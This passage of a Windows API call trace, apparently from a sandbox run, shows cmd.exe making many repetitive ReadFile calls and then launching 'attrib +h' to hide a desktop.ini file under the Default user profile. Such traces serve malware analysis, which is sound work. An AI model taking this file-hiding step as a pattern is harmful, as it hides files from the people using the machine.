lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.507] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.508] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, 
lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile 
(in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.509] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 
[0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.510] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, 
lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.511] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.516] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.516] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.517] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.519] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, 
lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.519] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: 
lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.521] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.522] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.541] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.541] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0209.542] _close (_FileHandle=3) returned 0 [0209.542] GetConsoleTitleW (in: lpConsoleTitle=0x2cf760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.542] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.542] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.542] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.543] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.543] FindClose (in: hFindFile=0x43e5e8 | out: hFindFile=0x43e5e8) returned 1 [0209.543] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0209.543] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0209.543] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.543] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf37c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf444 | out: lpAttributeList=0x2cf37c, lpSize=0x2cf444) returned 1 [0209.543] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf37c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf43c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf37c, lpPreviousValue=0x0) returned 1 [0209.543] GetStartupInfoW (in: lpStartupInfo=0x2cf338 | out: lpStartupInfo=0x2cf338*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0209.543] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.543] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, 
lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf3d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf424 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessInformation=0x2cf424*(hProcess=0x4c, hThread=0x50, dwProcessId=0xfdc, dwThreadId=0x6f0)) returned 1 [0209.545] CloseHandle (hObject=0x50) returned 1 [0209.545] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.545] GetEnvironmentStringsW () returned 0x442c70* [0209.545] FreeEnvironmentStringsW (penv=0x442c70) returned 1 [0209.545] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0209.581] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf318 | out: lpExitCode=0x2cf318*=0x0) returned 1 [0209.581] CloseHandle (hObject=0x4c) returned 1 [0209.581] _vsnwprintf (in: _Buffer=0x2cf460, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf324 | out: _Buffer="00000000") returned 8 [0209.581] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0209.581] GetEnvironmentStringsW () returned 0x442c70* [0209.582] FreeEnvironmentStringsW (penv=0x442c70) returned 1 [0209.582] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.582] GetEnvironmentStringsW () returned 0x442c70* [0209.582] FreeEnvironmentStringsW (penv=0x442c70) returned 1 [0209.582] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf37c 